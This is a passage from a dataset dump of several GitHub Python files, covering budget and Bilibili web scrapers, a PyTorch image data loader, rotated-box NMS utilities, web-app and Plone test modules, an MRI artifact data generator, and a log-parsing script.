sample.getText().rstrip()\n\t\thtml_detailed = parseDetailed(link)\n\t\tsuop_detailed = BeautifulSoup(html_detailed)\n\t\theaders = tables = suop_detailed.find_all(\"h1\")\n\t\theader = headers[0]\n\t\ttables = suop_detailed.find_all(\"td\")\n\t\toldlen = len(tables)\n\t\tfor longtables in range(0,len(tables)*5):\n\t\t\ttables.append(tables[longtables])\n\t\tprint(tables[21].getText().rstrip())\n\t\tname = header.getText() # Nazvanie Programmi\n\t\tadministrator_budget_program = tables[1].getText() # Администратор бюджетных программ\n\t\tbudget_programm = tables[3].getText()\n\t\thead_budget_programm = tables[5].getText()\n\t\tprint(head_budget_programm)\n\t\tnorm_prav_osnova = tables[7].getText()\n\t\topisanie_obosnovanie = tables[9].getText()\n\t\tvid_gos_upr = tables[11].getText()\n\t\tvid_gos_sod = tables[13].getText()\n\t\tvid_soc_real = tables[15].getText()\n\t\ttekushee_ili_razvitie = tables[17].getText()\n\t\tgoal = tables[19].getText()\n\t\tzadacha = tables[21].getText()\n\t\tyear = tables[23].getText()\n\t\thowmany = 0\n\t\tstart = 0\n\t\tmoney_type = 'тенге'\n\t\tbudget_2016 = 0\n\t\tbudget_2017 = 0\n\t\tbudget_2018 = 0\n\t\tbudget_2019 = 0\n\t\tbudget_2020 = 0\n\t\tonce = True\n\t\toverallindex = 0\n\t\tfor q in range(0, oldlen):\n\t\t\tif tables[q].getText().rstrip()==\"Расходы по бюджетной программе, всего\":\n\t\t\t\tprint('start')\n\t\t\t\tstart = q\n\t\t\tif ((\"Итого расходы по бюджетной\" in tables[q].getText().rstrip()) and once):\n\t\t\t\tprint(tables[q].getText().rstrip())\n\t\t\t\tonce = False\n\t\t\t\toverallindex = q\n\t\t\t\thowmany = int((q - start)/7)\n\t\t\t\tprint(howmany)\n\t\tmoney_type = tables[overallindex+1].getText()\n\t\tbudget_2016 = tables[overallindex+2].getText()\n\t\tbudget_2017 = tables[overallindex+3].getText()\n\t\tbudget_2018 = tables[overallindex+4].getText()\n\t\tbudget_2019 = tables[overallindex+5].getText()\n\t\tbudget_2020 = tables[overallindex+6].getText()\n\t\tprogramm = Programme(name = name, administrator_budget_program = administrator_budget_program, budget_programm = budget_programm, norm_prav_osnova = norm_prav_osnova, opisanie_obosnovanie=opisanie_obosnovanie,vid_gos_upr=vid_gos_upr,vid_gos_sod=vid_gos_sod,vid_soc_real=vid_soc_real,tekushee_ili_razvitie=tekushee_ili_razvitie,goal=goal,zadacha=zadacha,year=year,money_type=money_type,budget_2016=budget_2016,budget_2017=budget_2017,budget_2018=budget_2018,budget_2019=budget_2019,budget_2020=budget_2020)\n\t\tprogramm.save()\t\n\t\tfor o in range(0,howmany):\n\t\t\tstart = o*7+start\n\t\t\tsp = SubProgramm(name = tables[start+1].getText(),money_type = tables[start+2].getText(),budget_2016 = tables[start+3].getText(),budget_2017 = tables[start+4].getText(),budget_2018 = tables[start+5].getText(),budget_2019 = tables[start+6].getText(),budget_2020 = tables[start+7].getText())\n\t\t\trelation = programm.relation('subProgrammes')\n\t\t\trelation.add([sp])\n\n\n\t\t\n\n\n\n\n\t\n\n","repo_name":"Flaminis/openBudget","sub_path":"egov.py","file_name":"egov.py","file_ext":"py","file_size_in_byte":4106,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"9770072413","text":"import os\nimport torch\nimport random\nimport signal\nimport numpy as np\nfrom collections import namedtuple\nfrom copper import index\nfrom copper import utils\n\n# for loading and transforming images; move this outside of DataProvider?\n# Could map across many procs via zeromq?\nfrom PIL import Image\nfrom torchvision import transforms\nfrom functools import partial\nfrom multiprocessing import Pool \n\n# Tell workers to ignore Ctrl-C; let the parent process handle it\ndef _init_pool_worker():\n signal.signal( signal.SIGINT, signal.SIG_IGN )\n\npool = Pool( processes = 4, initializer = _init_pool_worker ) \n\n\n# Extending Dataset allows us to work in concert with torch.utils.data.DataLoader,\n# which is convenient\nclass DataProvider( torch.utils.data.Dataset ):\n INVALID_CLASS_ID = -1\n\n def __init__( self, args = None ):\n super().__init__()\n \n self._args = args\n self._index = None\n# self._class_table = None\n# self._path_table = None\n self._num_items = 0\n self._load_function = self._default_load\n self._augment_function = self._default_augment\n self._sample_size = (3, 256, 256)\n self._crop_size = (3, 224, 224)\n self._batch_dim = (128, 3, 224, 224) # Assume ImageNet-type usage\n self._normalization = utils.NORMALIZE_IMAGENET\n\n print( \"DataProvider: sample_size:%s crop_size:%s\" % \n (str(self._sample_size), str(self._crop_size)) )\n \n\n def classname_from_id( class_id ):\n return self._class_table[ class_id ]\n \n \n @staticmethod\n def from_index( path ):\n #print( \"Loading index %s\" % path )\n provider = DataProvider()\n provider.index = index.Index.from_path( path )\n \n return provider\n\n # Assume samples are images; use PIL to load them\n # TODO: return object descriptions, if present\n def _default_load( self, sample, sample_size ):\n if not sample:\n raise IOError( \"_default_load: sample is null\" )\n \n try:\n class_path = self.index.path_table.classpath_from_id( sample.path_id )\n path = class_path + os.path.sep + sample.filename\n\n image = Image.open( path )\n\n if sample_size:\n bpp = sample_size[0]\n width = sample_size[1]\n height = sample_size[2]\n\n # If image is smaller than (width, height) resize before cropping\n image_width = image.width\n image_height = image.height\n\n scale_width = width / image_width\n scale_height = height / image_height\n scale = max(scale_width, scale_height)\n\n old_size = image_width, image_height\n new_size = (int)(scale * image_width), (int)(scale * image_height)\n\n #print( \"_default_load %d x %d -> %d x %d\" % ( image.width, image.height, new_size[0], new_size[1] ) )\n\n image = image.resize( new_size ) # don't use thumbnail; it won't size up, only down\n \n if image.mode != 'RGB':\n image = image.convert( 'RGB' )\n except (IOError, TypeError) as error:\n print( \"_default_load %s\" % (error) );\n print( sample )\n raise IOError from error\n return None\n\n return image;\n\n #\n # TODO: move augmentation functions into class methods or even a separate module\n #\n def _no_augment_center_crop( self, image, crop_size ):\n bpp = crop_size[ 0 ]\n width = crop_size[ 1 ]\n height = crop_size[ 2 ] \n\n if not image:\n raise IOError( \"_no_augment_center_crop: image is null\" )\n\n left = (int)((image.width - width) / 2) \n right = left + width\n top = (int)((image.height - height) / 2)\n bottom = top + height\n\n crop = image.crop( (left, top, right, bottom) ) \n\n print( \"_no_augment_center_crop %d x %d -> %d x %d\" % (image.width, image.height, crop.width, crop.height) )\n\n crop = transforms.ToTensor()( crop )\n\n if self._normalization:\n crop = transforms.Normalize(\n mean = self._normalization.mean, \n std = self._normalization.std )( crop )\n\n return crop\n\n # return the full image (for validation / inference; the 5-crops or 10-crops will be performed \n # in the main loop because DataLoader doesn't really support in-place expansion of the number of samples)\n def _no_augment_no_crop( self, image, crop_size ):\n bpp = crop_size[ 0 ]\n width = crop_size[ 1 ]\n height = crop_size[ 2 ] \n\n if not image:\n raise IOError( \"_no_augment_no_crop: image is null\" )\n\n img = image.resize( (width, height), resample = Image.BILINEAR )\n #print( \"_no_augment_no_crop %d x %d -> %d x %d\" % (image.width, image.height, img.width, img.height) )\n img = transforms.ToTensor()( img )\n\n if self._normalization:\n img = transforms.Normalize(\n mean = self._normalization.mean,\n std = self._normalization.std )( img )\n\n return img\n\n # Assume samples are images, and apply standard ImageNet-ish transformations\n # Should return a float tensor, not a CUDA tensor, becuase this will be run in another process\n # that can't use CUDA\n def _default_augment( self, image, crop_size ):\n bpp = crop_size[ 0 ]\n width = crop_size[ 1 ]\n height = crop_size[ 2 ]\n\n if not image:\n raise IOError( \"_default_augment: image is null\" )\n\n crop = transforms.RandomResizedCrop( size = width )( image ) # equivalent to scale(0.08 - 1.0), then crop\n crop = transforms.RandomHorizontalFlip()( crop )\n crop = transforms.ToTensor()( crop )\n\n if self._normalization:\n crop = transforms.Normalize(\n mean = self._normalization.mean,\n std = self._normalization.std )( crop )\n\n return crop\n\n # If a sample fails to load (e.g. malformed PNG or JPEG) we need to return\n # a dummy tensor of the proper dimensions.\n # Otherwise iterating over the DataProvider via a torch.utils.data.DataLoader will explode.\n def _null_sample( self, sample_size ):\n bpp = sample_size[0]\n width = sample_size[1]\n height = sample_size[2]\n tensor = torch.FloatTensor( bpp, width, height ).zero_()\n class_id = random.randint( 0, len(self.index.class_table) - 1 )\n\n #print( \"_null_sample( %d )\" % class_id )\n \n return tensor, class_id\n \n\n def _get_sample( self, sample ):\n # Load the training targets (one or more class_ids and optional bounding boxes)\n class_ids = []\n bounding_boxes = []\n for obj in sample.objects:\n class_ids.append( obj.class_id )\n bounding_boxes.append( obj.bounding_box )\n\n class_ids = torch.from_numpy(np.array(class_ids))\n bounding_boxes = torch.from_numpy(np.array(bounding_boxes))\n \n if len(class_ids) == 1:\n class_ids = class_ids.squeeze()\n bounding_boxes = bounding_boxes.squeeze()\n\n # Load and transform the image\n try:\n img = self._load_function( sample, self._sample_size )\n tensor = self._augment_function( img, self._crop_size )\n except IOError as error:\n # DataLoader pukes if we return None, so return an empty Sample\n print( \"__getitem__ %s : %s - returning zero tensor\" % (sample.path, error) )\n tensor, class_ids, bounding_boxes = self._null_sample( self._sample_size )\n\n# print( \"class_ids = \", class_ids )\n# print( \"bounding_boxes = \", bounding_boxes )\n \n return tensor, class_ids, bounding_boxes\n \n \n # DataProvider supports [] operator\n # It returns images and their training targets after loading, augmenting (crop, flip, etc), and normalizing\n # TODO: should it also convert to tensor? Can't call CUDA from multiple threads, but\n # might well map iteration of DataProvider to multiple threads, so convert to CUDA tensors in the reducer?\n def __getitem__( self, key ):\n if isinstance( key, slice ):\n samples = [self._index[ i ] for i in range( *key.indices(self._num_items) ) ] # assumes Python 3 range()\n \n batch_tensors = []\n batch_class_ids = []\n batch_bounding_boxes = []\n\n for sample in samples:\n tensor, class_ids, bounding_boxes = self._get_sample( sample )\n \n batch_tensors.append( tensor )\n batch_class_ids.append( class_ids )\n batch_bounding_boxes.append( bounding_boxes )\n \n return batch_tensors, batch_class_ids, batch_bounding_boxes\n \n if key < 0:\n key += self._num_items\n # wrap-around and fall-through\n \n if key < 0 or key >= self._num_items:\n raise IndexError\n\n sample = self._index[ key ]\n tensor, class_ids, bounding_boxes = self._get_sample( sample )\n\n return tensor, class_ids, bounding_boxes\n\n \n # DataProvider is iterable\n # Iteration may apply run-time augmentation filters: crop, flip, scale, warp, color, noise\n # Iteration may load (and cache) samples on the fly\n def __len__(self):\n return len( self._index )\n\n\n def __iter__( self ):\n self._idx = 0\n return self\n\n \n def __next__( self ):\n if self._idx >= self._num_items:\n raise StopIteration\n \n sample, label = self.__getitem__( self._idx )\n self._idx += 1\n \n return sample, label\n \n \n\n #\n # Properties\n #\n \n def _get_index( self ):\n return self._index\n\n def _set_index( self, index ):\n self._index = index\n self._class_table = index.class_table\n self._path_table = index.path_table\n self._num_items = index.num_items\n \n def _get_name( self ):\n if self._index:\n return self._index.name\n else:\n return \"Unknown\"\n\n def _get_path( self ):\n if self._index:\n return self._index.index_path\n else:\n return \"Unknown\"\n\n def _get_class_table( self ):\n return self._class_table\n\n def _get_path_table( self ):\n return self._path_table\n \n def _get_num_items( self ):\n return self._num_items\n\n def _get_num_classes( self ):\n return len( self._class_table )\n\n def _set_transforms( self, transforms ):\n self._transforms = transforms\n \n def _get_transforms( self ):\n return self._transforms\n \n def _set_sample_size( self, sample_size ):\n self._sample_size = sample_size\n \n def _get_sample_size( self ):\n return self._sample_size\n\n def _set_crop_size( self, crop_size ):\n self._crop_size = crop_size\n \n def _get_crop_size( self ):\n return self._crop_size\n\n def _get_augment_function( self ):\n return self._augment_function\n #return _augment_function\n\n def _set_augment_function( self, augment_function ):\n if augment_function:\n self._augment_function = augment_function\n else:\n #self._augment_function = self._no_augment_center_crop\n self._augment_function = self._no_augment_no_crop\n \n def _get_load_function( self ):\n return self._load_function\n \n def _set_load_function( self, load_function ):\n self._load_function = load_function\n\n def _get_invalid_class_id( self ):\n return -1\n \n #def _get_labels( self ):\n # labels = []\n # for sample in self._index:\n # labels.append( sample.class_id )\n\n def _get_normalization( self ):\n return self._normalization\n\n def _set_normalization( self, normalization ):\n if normalization and type(normalization) != Normalization:\n print( \"DataProvider.normalization must be of type Normalization( mean, std )\" );\n return\n self._normalization = normalization\n \n\n index = property( _get_index, _set_index )\n name = property( _get_name, None )\n path = property( _get_path, None )\n class_table = property( _get_class_table, None )\n path_table = property( _get_path_table, None )\n num_items = property( _get_num_items, None )\n num_classes = property( _get_num_classes, None )\n transforms = property( _get_transforms, _set_transforms )\n sample_size = property( _get_sample_size, _set_sample_size )\n crop_size = property( _get_crop_size, _set_crop_size )\n augment_function = property( _get_augment_function, _set_augment_function )\n load_function = property( _get_load_function, _set_load_function )\n #labels = property( _get_labels, None )\n normalize = property( _get_normalization, _set_normalization )\n","repo_name":"skelleher/copper","sub_path":"data_provider.py","file_name":"data_provider.py","file_ext":"py","file_size_in_byte":13196,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"1453587621","text":"from decimal import Decimal\nfrom bs4 import BeautifulSoup\nimport matplotlib.pyplot as plt\nimport urllib.request\nimport json\nimport requests\nimport re\nimport pandas as pd\n\n# link1 = 'http://www.dianping.com/brisbane/ch20/g119r81002o3'\n\n\nlink = \"https://www.bilibili.com/ranking/bangumi/13/0/7\"\n\n\ndef get_HTML(link_name):\n headers = {\n 'user-agent': 'Mozilla / 5.0(Windows NT 10.0; WOW64) AppleWebKit / 537.36(KHTML, likeGecko) Chrome / '\n '53.0.2785.104Safari / 537.36Core / 1.53.4882.400QQBrowser / 9.7.13059.400'\n }\n response = requests.get(link_name, headers=headers)\n print(response.status_code)\n response.encoding = None\n if response.status_code != 200:\n raise ConnectionError\n result = response.text\n soup = BeautifulSoup(result, 'html.parser')\n print(soup)\n return soup\n\n\ndef str_to_double(df_name):\n for c in range(len(df_name)):\n # print(row)\n if re.search('万', df_name[c]):\n row = df_name[c]\n df_name[c] = Decimal(row[:-1])\n else:\n row = df_name[c]\n row = Decimal(row[:-1])\n df_name[c] = row * 10000\n\n\ndef manage_data():\n soup_doc = get_HTML()\n data = []\n i = 0\n\n soup_doc_next = soup_doc.find(\"div\", attrs={\"class\": \"rank-list-wrap\"})\n soup_doc_next_ul = soup_doc_next.find(\"ul\", attrs={\"class\": \"rank-list pgc-list\"})\n soup_find_li = soup_doc_next_ul.find_all('li')\n for s in soup_find_li:\n i += 1\n soup_find_class = s.find(\"div\", attrs={\"class\": \"content\"})\n soup_find_name = soup_find_class.find(\"img\")\n soup_find_detail = soup_find_class.find(\"div\", attrs={\"class\": \"detail\"})\n data_box = soup_find_detail.find_all(\"span\", attrs={\"class\": \"data-box\"})\n play_data = [data.text for data in data_box]\n data.append([i, soup_find_name['alt']] + play_data)\n\n columns = [\"total_rank\", \"title\", \"play\", \"comments\", \"liked\"]\n df = pd.DataFrame(data, columns=columns)\n for name in [\"play\", \"comments\", \"liked\"]:\n str_to_double(df[name])\n print(df)\n\n df.plot.bar(x=df['title'], y=[df['play']])\n plt.show()\n\n\n# manage_data()\n\nget_HTML(link)\n\n","repo_name":"nexusme/leetcode_try","sub_path":"LeetCode/fetch_bilibili.py","file_name":"fetch_bilibili.py","file_ext":"py","file_size_in_byte":2185,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"33243821928","text":"import numpy as np\nimport torch\n\nfrom . import nms_rotated_ext\n\n\ndef obb2hbb(obboxes):\n \"\"\"Convert oriented bounding boxes to horizontal bounding boxes.\n\n Args:\n obboxes (torch.Tensor): [x_ctr,y_ctr,w,h,angle]\n Returns:\n hbbs (torch.Tensor): [x_lt,y_lt,x_rb,y_rb]\n \"\"\"\n center, w, h, theta = torch.split(obboxes, [2, 1, 1, 1], dim=1)\n Cos, Sin = torch.cos(theta), torch.sin(theta)\n x_bias = torch.abs(w / 2 * Cos) + torch.abs(h / 2 * Sin)\n y_bias = torch.abs(w / 2 * Sin) + torch.abs(h / 2 * Cos)\n bias = torch.cat([x_bias, y_bias], dim=1)\n return torch.cat([center - bias, center + bias], dim=1)\n\n\ndef obb_nms(dets, iou_thr, device_id=None):\n \"\"\"Compute the NMS of oriented bboxes.\"\"\"\n if isinstance(dets, torch.Tensor):\n is_numpy = False\n dets_th = dets\n elif isinstance(dets, np.ndarray):\n is_numpy = True\n device = 'cpu' if device_id is None else f'cuda:{device_id}'\n dets_th = torch.from_numpy(dets).to(device)\n else:\n raise TypeError('dets must be eithr a Tensor or numpy array, '\n f'but got {type(dets)}')\n\n if dets_th.numel() == 0:\n inds = dets_th.new_zeros(0, dtype=torch.int64)\n else:\n # same bug will happen when bboxes is too small\n too_small = dets_th[:, [2, 3]].min(1)[0] < 0.001\n if too_small.all():\n inds = dets_th.new_zeros(0, dtype=torch.int64)\n else:\n ori_inds = torch.arange(dets_th.size(0))\n ori_inds = ori_inds[~too_small]\n dets_th = dets_th[~too_small]\n\n bboxes, scores = dets_th[:, :5], dets_th[:, 5]\n inds = nms_rotated_ext.nms_rotated(bboxes, scores, iou_thr)\n inds = ori_inds[inds]\n\n if is_numpy:\n inds = inds.cpu().numpy()\n return dets[inds, :], inds\n\n\ndef poly_nms(dets, iou_thr, device_id=None):\n \"\"\"Compute the NMS of polygons.\"\"\"\n if isinstance(dets, torch.Tensor):\n is_numpy = False\n dets_th = dets\n elif isinstance(dets, np.ndarray):\n is_numpy = True\n device = 'cpu' if device_id is None else f'cuda:{device_id}'\n dets_th = torch.from_numpy(dets).to(device)\n else:\n raise TypeError('dets must be eithr a Tensor or numpy array, '\n f'but got {type(dets)}')\n\n if dets_th.device == torch.device('cpu'):\n raise NotImplementedError\n inds = nms_rotated_ext.nms_poly(dets_th.float(), iou_thr)\n\n if is_numpy:\n inds = inds.cpu().numpy()\n return dets[inds, :], inds\n\n\ndef obb_batched_nms(bboxes, scores, inds, nms_thr, class_agnostic=False):\n \"\"\"Compute the NMS of oriented bboxes in batches.\"\"\"\n if class_agnostic:\n bboxes_for_nms = bboxes\n else:\n hbboxes = obb2hbb(bboxes) if bboxes.size(-1) == 5 else bboxes\n max_coordinate = hbboxes.max() - hbboxes.min()\n offsets = inds.to(bboxes) * (max_coordinate + 1)\n\n if bboxes.size(-1) == 5:\n bboxes_for_nms = bboxes.clone()\n bboxes_for_nms[:, :2] = bboxes_for_nms[:, :2] + offsets[:, None]\n else:\n bboxes_for_nms = bboxes + offsets[:, None]\n\n dets, keep = obb_nms(\n torch.cat([bboxes_for_nms, scores[:, None]], -1), nms_thr)\n bboxes = bboxes[keep]\n scores = dets[:, -1]\n return torch.cat([bboxes, scores[:, None]], -1), keep\n","repo_name":"SJTU-Thinklab-Det/r3det-pytorch","sub_path":"r3det/ops/nms_rotated/nms_rotated_wrapper.py","file_name":"nms_rotated_wrapper.py","file_ext":"py","file_size_in_byte":3351,"program_lang":"python","lang":"en","doc_type":"code","stars":40,"dataset":"github-code","pt":"21"} +{"seq_id":"74997000372","text":"import pytest # type: ignore\nfrom datetime import datetime, timedelta\n\nimport hopeit.toolkit.auth as auth\nfrom hopeit.app.context import EventContext, PostprocessHook\n\nfrom app0.platform.auth import logout # type: ignore\nfrom hopeit.app.errors import Unauthorized\nfrom hopeit.server.config import AuthType\nfrom . import mock_app_config, plugin_config # noqa: F401\n\n\nasync def invoke_logout(context: EventContext):\n auth_info = await logout.logout(None, context)\n assert auth_info is None\n\n\nasync def invoke_postprocess(payload: None, context: EventContext):\n hook = PostprocessHook()\n result = await logout.__postprocess__(payload, context, response=hook)\n assert hook.del_cookies == [('test_app.test.refresh', (), {'domain': None, 'path': '/'})]\n assert result == 'Logged out.'\n\n\nasync def execute_flow(context):\n await invoke_logout(context)\n await invoke_postprocess(None, context)\n\n\ndef _event_context(mock_app_config, plugin_config): # noqa: F811\n iat = datetime.now()\n timeout = plugin_config.env['auth']['access_token_expiration']\n return EventContext(\n app_config=mock_app_config,\n plugin_config=plugin_config,\n event_name='login',\n track_ids={},\n auth_info={\n 'allowed': True,\n 'auth_type': AuthType.REFRESH,\n 'payload': {'id': 'id', 'user': 'test', 'email': 'test@email', 'iat': iat,\n 'exp': iat + timedelta(seconds=timeout)}\n }\n )\n\n\n@pytest.mark.asyncio\nasync def test_logout(mock_app_config, plugin_config): # noqa: F811\n auth.init(mock_app_config.app_key(), mock_app_config.server.auth)\n context = _event_context(mock_app_config, plugin_config)\n await execute_flow(context)\n\n\n@pytest.mark.asyncio\nasync def test_logout_unauthorized(mock_app_config, plugin_config): # noqa: F811\n auth.init(mock_app_config.app_key(), mock_app_config.server.auth)\n context = _event_context(mock_app_config, plugin_config)\n context.auth_info['auth_type'] = \"UNKNOWN\"\n with pytest.raises(Unauthorized):\n await execute_flow(context)\n","repo_name":"fhernand23/stateless-microservices-platform","sub_path":"app0-admin/plugins/platform-auth/test/unit/test_logout.py","file_name":"test_logout.py","file_ext":"py","file_size_in_byte":2092,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"21"} +{"seq_id":"27838708085","text":"# -*- coding: utf-8 -*-\nfrom plone.app.robotframework.testing import REMOTE_LIBRARY_BUNDLE_FIXTURE\nfrom plone.app.testing import applyProfile\nfrom plone.app.testing import FunctionalTesting\nfrom plone.app.testing import IntegrationTesting\nfrom plone.app.testing import PLONE_FIXTURE\nfrom plone.app.testing import PloneSandboxLayer\nfrom plone.testing import z2\n\nimport medialog.spacetectheme\n\n\nclass MedialogSpacetecthemeLayer(PloneSandboxLayer):\n\n defaultBases = (PLONE_FIXTURE,)\n\n def setUpZope(self, app, configurationContext):\n # Load any other ZCML that is required for your tests.\n # The z3c.autoinclude feature is disabled in the Plone fixture base\n # layer.\n self.loadZCML(package=medialog.spacetectheme)\n\n def setUpPloneSite(self, portal):\n applyProfile(portal, 'medialog.spacetectheme:default')\n\n\nMEDIALOG_SPACETECTHEME_FIXTURE = MedialogSpacetecthemeLayer()\n\n\nMEDIALOG_SPACETECTHEME_INTEGRATION_TESTING = IntegrationTesting(\n bases=(MEDIALOG_SPACETECTHEME_FIXTURE,),\n name='MedialogSpacetecthemeLayer:IntegrationTesting'\n)\n\n\nMEDIALOG_SPACETECTHEME_FUNCTIONAL_TESTING = FunctionalTesting(\n bases=(MEDIALOG_SPACETECTHEME_FIXTURE,),\n name='MedialogSpacetecthemeLayer:FunctionalTesting'\n)\n\n\nMEDIALOG_SPACETECTHEME_ACCEPTANCE_TESTING = FunctionalTesting(\n bases=(\n MEDIALOG_SPACETECTHEME_FIXTURE,\n REMOTE_LIBRARY_BUNDLE_FIXTURE,\n z2.ZSERVER_FIXTURE\n ),\n name='MedialogSpacetecthemeLayer:AcceptanceTesting'\n)\n","repo_name":"espenmn/spacetheme","sub_path":"medialog.spacetectheme/src/medialog/spacetectheme/testing.py","file_name":"testing.py","file_ext":"py","file_size_in_byte":1499,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"74133993971","text":"import math\nfrom pathlib import Path\n\nimport cv2\nimport numpy as np\nimport scipy.io as sio\nfrom OCTOPUS import ORC\nfrom tqdm import tqdm\n\nfrom artifactID.common import data_ops\nfrom artifactID.datagen import generate_fieldmap\n\n\ndef _gen_fieldmap(_slice, _freq_range):\n field_map, mask = generate_fieldmap.gen_smooth_b0(_slice, _freq_range) # Simulate the field map\n\n return field_map, mask\n\n\ndef orc_forwardmodel(vol: np.ndarray, freq_range: int, ktraj: np.ndarray, seq_params: dict):\n \"\"\"\n Adds off-resonance blurring to simulate B0 inhomogeneity artifacts.\n\n Parameters\n ==========\n vol : numpy.ndarray\n Image volume having dimensions N x N x N number of slices\n freq_range : int\n Frequency range for the simulated field map\n ktraj : numpy.ndarray\n k-space trajectory coordinates. Dimensions Npoints x Nshots\n seq_params : dict\n Sequence parameters needed for off-resonance corruption\n\n Returns\n =======\n arr_offres_vol : np.ndarray\n Corrupted image volume having dimensions Slices(with signal > 5%) x N x N\n \"\"\"\n\n seq_params['N'] = vol.shape[0]\n num_slices = vol.shape[2]\n arr_offres_vol = np.zeros(vol.shape)\n\n for ind in range(num_slices):\n slice = vol[:, :, ind]\n fieldmap, mask = _gen_fieldmap(_slice=slice, _freq_range=freq_range)\n or_corrupted = ORC.add_or_CPR(slice, ktraj, fieldmap, 1, seq_params) # Corrupt the image\n or_corrupted_norm = np.zeros(or_corrupted.shape)\n or_corrupted_norm = cv2.normalize(np.abs(or_corrupted), or_corrupted_norm, 0, 1,\n cv2.NORM_MINMAX) # Normalize [0, 1]\n arr_offres_vol[:, :, ind] = np.float16(or_corrupted_norm * mask)\n\n return arr_offres_vol\n\n\ndef main(path_read_data: Path, path_save_data: Path, path_ktraj: str, path_dcf: str, patch_size: list):\n # =========\n # LOAD PREREQUISITES\n # =========\n # 1. k-space trajectory\n ktraj = np.load(path_ktraj)\n ktraj_sc = math.pi / abs(np.max(ktraj))\n ktraj = ktraj * ktraj_sc # pyNUFFT scaling [-pi, pi]\n\n # 2. Density compensation factor\n dcf = sio.loadmat(path_dcf)['dcf_out'].flatten()\n\n # 3. Acquisition parameters\n t_vector = (np.arange(ktraj.shape[0]) * 10e-6).reshape(ktraj.shape[0], 1)\n seq_params = {'Npoints': ktraj.shape[0], 'Nshots': ktraj.shape[1], 't_vector': t_vector, 'dcf': dcf}\n\n # BraTS 2018 paths\n arr_path_read = data_ops.glob_nifti(path=path_read_data)\n\n arr_max_freq = [250, 500, 750] # Hz\n subjects_per_class = math.ceil(len(arr_path_read) / len(arr_max_freq)) # Calculate number of subjects per class\n arr_max_freq *= subjects_per_class\n np.random.shuffle(arr_max_freq)\n\n # =========\n # DATAGEN\n # =========\n for ind, path_t1 in tqdm(enumerate(arr_path_read)):\n vol = data_ops.load_nifti_vol(path=path_t1)\n freq = arr_max_freq[ind]\n vol_b0 = orc_forwardmodel(vol=vol, freq_range=freq, ktraj=ktraj, seq_params=seq_params)\n\n # Zero-pad vol, get patches, discard empty patches and uniformly intense patches and normalize each patch\n vol_b0 = data_ops.patch_compatible_zeropad(vol=vol_b0, patch_size=patch_size)\n patches, patch_map = data_ops.get_patches(vol=vol_b0, patch_size=patch_size)\n patches = data_ops.normalize_patches(patches=patches)\n\n # Save to disk\n _path_save = path_save_data.joinpath(f'b0{freq}')\n if not _path_save.exists():\n _path_save.mkdir(parents=True)\n for counter, p in enumerate(patches):\n subject = path_t1.name.replace('.nii.gz', '')\n _path_save2 = _path_save.joinpath(subject)\n _path_save2 = str(_path_save2) + f'_patch{counter}.npy'\n np.save(arr=p, file=_path_save2)\n","repo_name":"imr-framework/artifactID","sub_path":"artifactID/datagen/offres_datagen.py","file_name":"offres_datagen.py","file_ext":"py","file_size_in_byte":3782,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"21"} +{"seq_id":"16288434591","text":"#!/opt/local/bin/python\n#import numpy, re, sys\nimport re, sys\n\nfile = open(sys.argv[1], \"r\")\nranks = int(sys.argv[2])\nruns = int(sys.argv[3])\n\n#\n# 0 == Display Rank 0 only\n# 1 == Display Average over all ranks\ndisplay = 0\n\ndetect = list()\nrevoke = list()\nshrink = list()\nspawn = list()\nrollback = list()\nmerge = list()\n\nfor i in range(runs):\n detect.append(0)\n revoke.append(0)\n shrink.append(0)\n spawn.append(0)\n rollback.append(0)\n merge.append(0)\n\nlines = file.readlines()\n\nif display == 0:\n print(\"#RUNS: \" + str(runs))\n\nfor line in lines:\n values = line.split()\n if len(values) == 0 or values[0].startswith(\"#\"):\n continue\n\n run = runs - int(values[0])\n rank = int(values[1])\n\n if run > runs:\n run = runs\n break\n\n# Display the amount of time spent in each phase on rank 0\n if rank == 0 and display == 0:\n print( str(run) + \"\\t\" + \n str(float(values[2])) + \"\\t\" +\n str(float(values[3])) + \"\\t\" +\n str(float(values[4])) + \"\\t\" +\n str(float(values[5])) + \"\\t\" +\n str(float(values[6])) + \"\\t\" +\n str(float(values[7])) );\n\n detect[run] = detect[run] + float(values[2]);\n revoke[run] = revoke[run] + float(values[2]);\n shrink[run] = shrink[run] + float(values[2]);\n spawn[run] = spawn[run] + float(values[2]);\n rollback[run] = rollback[run] + float(values[2]);\n merge[run] = merge[run] + float(values[2]);\n\n# Display the average amount of time spent in each phase by all ranks\nif display != 0:\n print(\"#RUNS: \" + str(runs))\n for i in range(runs):\n print( str(i) + \"\\t\" + \n str(detect[i] / float(ranks - 1) ) + \"\\t\" +\n str(revoke[i] / float(ranks - 1) ) + \"\\t\" + \n str(shrink[i] / float(ranks - 1) ) + \"\\t\" + \n str(spawn[i] / float(ranks - 1) ) + \"\\t\" +\n str(rollback[i] / float(ranks - 1) ) + \"\\t\" +\n str(merge[i] / float(ranks - 1) ))\n\nexit(0)\n\n# Plot the average amount of time spent in each phase on each rank\n#print(\"#RUNS: \" + str(run))\n#for i in range(ranks):\n# detect[i].remove(min(detect[i]))\n# revoke[i].remove(min(revoke[i]))\n# shrink[i].remove(min(shrink[i]))\n# spawn[i].remove(min(spawn[i]))\n# rollback[i].remove(min(rollback[i]))\n# merge[i].remove(min(merge[i]))\n#\n# detect[i].remove(max(detect[i]))\n# revoke[i].remove(max(revoke[i]))\n# shrink[i].remove(max(shrink[i]))\n# spawn[i].remove(max(spawn[i]))\n# rollback[i].remove(max(rollback[i]))\n# merge[i].remove(max(merge[i]))\n#\n# print(str(i) + \"\\t\" +\n# str(numpy.average(detect[i])) + \"\\t\" +\n# str(numpy.average(revoke[i])) + \"\\t\" +\n# str(numpy.average(shrink[i])) + \"\\t\" +\n# str(numpy.average(spawn[i])) + \"\\t\" +\n# str(numpy.average(rollback[i])) + \"\\t\" +\n# 